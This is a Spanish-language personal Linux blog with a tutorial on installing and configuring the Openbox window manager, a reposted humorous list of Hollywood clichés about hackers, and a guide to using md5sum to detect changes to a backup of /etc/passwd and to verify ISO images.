Openbox es un gestor de ventanas libre para el Sistema X Window, disponible bajo licencia GPL. En sus inicios derivaba de Blackbox 0.65, pero ha sido totalmente reescrito y desde la versión 3.0 ya no está basado en ningúna porción de código ajeno. Está diseñado para ser rápido y consumir una mínima cantidad de recursos. Para conseguir esa ligereza sacrifica algunas funciones típicas en buena parte de los gestores de ventanas como por ejemplo barra de menú, lista de aplicaciones en ejecución o bordes redondeados en las ventanas. Pero a cambio ofrece otras posibilidades tales como menús generados dinámicamente capaces de ofrecer información variada.

Openbox cumple plenamente las especificaciones ICCCM y EWM. Segun Wikipedia

Bueno la verdad no conocia openbox y realmente me esta gustando mucho!. Es un gestor de ventanas livianito tipo fluxbox y se los recomiendo. Bueno ahora les voy a explicar como instalarlo y configurarlo.

Instalar los paquetes:


apt-get install openbox openbox-themes obconf obmenu


Listo con esto ya lo tenemos instalado. Solo faltaria incluirlo en el archivo /home/TUNOMBREDEUSUARIO/.xinitrc, si no lo tienen creenlo, a mi me quedó algo asi:

#xfce
#exec startxfce4

#fluxbox
#exec fluxbox

#io3
#exec ion3

#gnome
#exec gnome-session

#openbox
exec openbox

Lo iniciamos en alguna tty:

startx

Hacemos click con el derecho y tenemos el menu y los programas. Pero vemos que abrimos alguno y no tenemos el panel de tareas que nos indica los programas minimizados, para verlos tenemos que hacer alt+tab o sino instalar pypanel que se los recomiendo:

apt-get install pypanel

Debido a un problema de permisos pypanel solo se ejecuta en mi maquina en modo root, entonces para solucionarlo hice:

chown TUNOMBREDEUSUARIO:TUNOMBREDEUSUARIO /home/TUNOMBREDEUSUARIO/.Xauthority

Con esto ya tenemos funcionando pypanel. Le cambiamos el tema a openbox, abrimos obConf del menu y lo seleccionamos.
Si queremos cambiarle el wallpaper, lo haremos de la misma manera que en fluxbox. Yo utilizo fbsetbg.

fbsetbg -f fondos/fondolinux.jpg

Ahora vamos a modificar el menu! =).Deberan tener los archivos generales en su home para que se modifiquen por usuarios, si no tienen el menu en su home deben hacer:

cp /etc/xdg/openbox/rc.xml ~/.config/openbox/
cp /etc/xdg/openbox/menu.xml ~/.config/openbox/

Se acuerdan que instalamos obmenu, bueno este programita es un editor grafico para el menu pero como no aparece en el menu principal que hacemos? bueno no se preocupen que ya lo pensé jaja. Agreguen esto en el archivo .config/openbox/menu.xml de su home, antes de la linea que dice "item label="ObConf" ",por motivos que desconozco van a tener que agregarle el signo <> al final, porque si yo los coloco en esta pagina no se ve el codigo por motivos que desconozco y voy a investigar ahora =P.:
           
item label="Obmenu"
action name="Execute"
execute
obmenu
/execute
/action
/item


Bueno con esto ya lo tenemos bastante a punto!. Si queremos agregar un nuevo programa el menu principal, solo tendremos que abrir obmenu y hacer click en "New Item", luego en "Label" pondremos el nombre del programa y en "Execute" la direccion del ejecutable ej: /usr/bin/pidgin para el mensajero Pidgin.!

Por ultimo cuando vuelvan a iniciar se les habra ido el wallpaper y pypanel, entonces para que cada vez que inicien se les cargue tienen que agregar esto al archivo .xinitrc. Si quieren quitar un programa para que no se ejecute pueden agregar # al comienzo de la linea.

#openbox
fbsetbg -r fondos/ &
pypanel &
yakuake &
exec openbox




Les dejo algunas capturas de mi escritorio =). Espero que les halla gustado y/o servido. Cualquier duda pueden consultar. Saludos!





11/01/2007


Los Hackers Segun Hollywood.....

Articulo muy bueno y comico, tiene toda la razon =)...

1. Los hackers siempre se visten raro. Además, siempre tienen cara de hacker, excepto cuando son mujeres. En ese caso, parecen ex-modelos. Hollywood es tan riguroso en este sentido que puede uno fácilmente establecer algunos silogismos. Por ejemplo, en The Matrix , Neo –Keanu Reeves– no tiene cara de hacker, pero se viste raro. Por lo tanto, es un hacker. Trinity se viste raro y además la actriz empezó como modelo –Carrie-Ann Moss–. Super hacker Acid Burn, en la película Hackers de 1995, se viste muy raro y además Angelina Jolie también empezó como modelo. Hacker diplomada (Me apuntan aquí que Hugh Jackman no cumple estos requisitos, en Swordfish . Error, el personaje tiene cara de mutante, o de otro modo jamás habría participado en X-Men .)

2. Los escritorios de los hackers están muy desordenados y con no menos de dos pantallas, usualmente LCD de 32 pulgadas widescreen.

3. Los hackers sólo comen pizza, y lo hacen mientras hackean algo.

4. Los nerds siempre usan anteojos, si son hombres, y en el momento de mayor tensión, estas gafas se les rompen. Si se trata de una mujer, será bella pero torpe, como Sandra Bullock en La Red . En ambos casos, tienen gravísimas dificultades para encontrar pareja.

5. Una persona puede leer el diario sólo con la luz que emite un monitor. Además, esta luz es constante, aún cuando esta persona esté moviendo ventanas y abriendo y cerrando programas.

6. Las pantallas de los hackers están repletas de ventanas, y en varias de ellas se listan cosas incomprensibles todo el tiempo.

7. Windows no es usado ni por empresas ni por organismos del Estado ni por hackers. En las películas, sólo se ven interfaces que no corresponden a ningún sistema operativo conocido. (Excepción honrosa, en The Matrix Reloaded , Trinity usa una notebook que está corriendo Linux y un programa llamado NMap .)

8. Toda contraseña es fácil de adivinar. Basta crujir los dedos, entrecerrar los ojos y pensar un poco. En ocasiones, hay que pensar muchísimo, los involucrados realmente experimentan un castigo físico extremo y teclean un montón de código (al parecer, C). Nunca usan un programa para quebrar contraseñas.

8bis. Si el punto anterior no es enteramente cierto, entonces podría significar que las computadoras modernas sólo admiten un número limitado de posibles contraseñas. En otras palabras, no hay mayor diferencia entre una estación de trabajo de última generación y un cajero automático.

9. Además, los sistemas de seguridad aceptan que un hacker ingrese 350.000 claves equivocadas sin bloquearse. Pan comido

9bis. Eso sí, cada vez que ingresa una contraseña inválida, recibe el mensaje de “Access Denied”, nunca otro.

10. Toda la superficie del planeta tiene conexiones Wi-Fi de alta velocidad con Internet y todos los organismos del mundo tienen sus servidores conectados a la gran Red. Así, el héroe no tiene problema de ingresar a una base de datos sensible de la Agencia Nacional de Seguridad de los Estados Unidos a las 4 de la mañana desde un auto estacionado junto a un puente del siglo XI sobre el río Garonne, en Toulouse, Francia.

11. A pesar de esto, los hackers invariablemente optan por ir a una casilla telefónica para invadir un sistema.

12. Borrar de manera segura todo un disco duro de 250 GB cuando están llegando las fuerzas policiales a la casa de un hacker (o del protagonista, como en Blade ) toma sólo 5 segundos. En cambio, copiar un pequeño archivo de texto con los resúmenes de las cuentas bancarias secretas de un traficante de drogas requiere tres exasperantes minutos. El indicador de progreso de esta lenta operación aparece en pantalla con música de suspenso.

12 bis. Hasta hace un tiempo, los robos de datos se hacían en antediluvianos diskettes. Ahora, se usan CD pero, eso sí, se los emplea como diskettes. No hace falta escribir el Lead-in ni el Lead-out , formatearlos, inicializarlos o todas esas tonterías que sólo necesitan realizar los que no son hackers.

13. Las Mac poseen aproximadamente el 90% del mercado de las computadoras hogareñas.

13 bis. No obstante esto, el mouse no existe. En las películas todo se hace tecleando frenéticamente, en general sin mirar lo que se escribe y sudando copiosamente.

14. Un disparo de arma de fuego en el gabinete de una computadora hace que el monitor explote y que el disco rígido se vuelva inservible. Vaya puntería.

15. Inversamente, una notebook destruida en una violenta explosión todavía conserva sus chips internos en perfectas condiciones y un experto puede acceder a los datos del fabricante sin problema.

16. Las notebooks jamás se quedan sin batería.

17. Los celulares, siempre.

18. En muchos lugares del mundo uno puede sacarle el celular a un desconocido que está hablando en la calle sin que lo muelan a uno a palos. Alcanza con decir: “Necesito su teléfono, amigo”

19. Las transferencias de dinero entre cuentas bancarias se hacen en un suspiro y no hay límite. Por ejemplo, es posible traspasar 50 millones de dólares desde una cuenta en los Estados Unidos a otra en las Islas Caimán sin que a nadie se le ocurra preguntar nada.

20. Cuando una computadora hace zoom sobre una foto para ampliar un detalle, ocurren dos cosas. Primero, hace ruido de zoom (un chirrido como de cámara fotográfica); segundo, la resolución aumenta conforme a la ampliación sin perder nada de detalle.

21. El programa más avanzado de tratamiento de imágenes suele ser el Paint .

22. Las computadoras pueden encenderse apretando un interruptor en el monitor. La opción, que he meditado largamente, es que la máquina en realidad esté encendida y que el hacker sólo encienda la pantalla para a) ahorrar energía y proteger el medio ambiente o b) porque no sabe cómo activar DPMS.

23. Todos los sistemas operativos muestran una bomba en la pantalla cuando se cuelgan.

24. Los virus causan la aparición de calaveras en las pantallas de las máquinas infectadas.

25. Los hackers “malos” hablan por teléfono usando un auricular Bluetooth. Los hackers “buenos” hacen videoconferencia.

Por Ariel Torres

http://www.lanacion.com.ar/tecnolog...?nota_id=923599


Como usar Md5sum en Linux!

Bueno hace rato que no posteaba nada =P, estoy bastante vago jeje. Voy a explicar como utilizar md5sum en linux para crear copias de seguridad de nuestros archivos importantes y luego comprobarlos si no se modificaron, de esta manera podemos estar seguros que no fueron tocados por nadie ajeno a nuestra persona =).
Primero algo de teoria como siempre para saber que es lo que hacemos:

Md5sum es un comando de los sistemas Unix que permite identificar la integridad de un fichero mediante de la suma de comprobación del hash MD5 de un archivo.

Realmente es muy utilizado por su sencilléz de uso, potencia y popularidad, siendo relativamente sencillo el comprobar si un determinado archivo se ha descargado correctamente o por el contrario ha ocurrido algun problema y el programa o imagen ISO es inutilizable (es ideal para comprobar las imagenes ISO de CD's, antes de tostarlas). En el mundo Linux, es muy habitual encontrar las sumas de control MD5 de todos los paquetes que componen una distribución.

Se suele utilizar para comprobar la integridad de los archivos descargados de Internet.(Wikipedia.org)

Comencemos:
Supongamos que queremos hacer una copia de seguridad de nuestro archivo /etc/passwd que contiene todos los usuarios del sistema, asi tenemos un control de que nadie creó un nuevo usuario.Entonces hacemos:


debian:~# mkdir CopiaSegu
debian:~# cp /etc/passwd CopiaSegu/passwdbackup

#Lo que hicimos fué crear una carpeta llama CopiaSegu en el directorio /root, xq somos root claro y copiar el #archivo passwd con el nombre passwdbackup

debian:~# cd CopiaSegu/
debian:~/CopiaSegu# md5sum passwdbackup > HashPasswdBackup

#Con el comando md5sum obtenemos la hash y luego dirigimos la salida al archivo HashPasswdBackup.

debian:~/CopiaSegu# cat HashPasswdBackup
e9b5763326ff6630824bf8c07249ae35 passwdbackup

#Vemos la hash que conseguimos.Listo ya esta. =). Ahora agregaremos un nuevo usuario para ver que pasaría...

debian:~# adduser hash
Adding user `hash' ...
Adding new group `hash' (1008) ...
Adding new user `hash' (1006) with group `hash' ...
Creating home directory `/home/hash' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: contraseña actualizada correctamente
Cambiando la información de usuario para hash
Introduzca el nuevo valor, o presione ENTER para el predeterminado
Nombre completo []:
Número de habitación []:
Teléfono del trabajo []:
Teléfono de casa []:
Otro []:
¿Es correcta la información? [y/N] y
debian:~#

#Verificamos si el nuevo archivo passwd tiene la misma hash. Pero primero modificamos el nombre del antiguo backup #con el comando mv para que no se reescriba y luego lo reemplazamos.

debian:~/CopiaSegu# mv passwdbackup passwdbackup.viejo
debian:~/CopiaSegu# cp /etc/passwd passwdbackup

#Ahora comprobaremos si el nuevo hash conside con el guardado en HashPasswdBackup

debian:~/CopiaSegu# md5sum -c HashPasswdBackup
passwdbackup: La suma no coincide
md5sum: WARNING: 1 of 1 computed checksum did NOT match

#Nos aparecio un cartel de advertencia diciendo que no coincide obviamente ya que agregamos un nuevo usuario. Aún modificando solamente una letra del antiguo archivo daria resultados totalmente distintos en la comprobacion.
utilizamos el parametro -c para decirle que lea la suma md5 de un archivo en este caso HashPasswdBackup.
Este procedimiento lo podemos aplicar claramente a los cds, ya que generalmente nos dan para descargar las imagenes isos con sus correspondientes hashes. Tenemos que guardarlos en la misma carpeta y luego utilizar el comando:

# md5sum -c ArchivoConSumaHash

Y despues de un momento nos informaria si coinciden. Espero que les halla servido como me sirvio a mi =).
Mi blog esta en etapa de remodelacion, no se preocupen si se ve horrible a causa de algunas plantillas. Saludos!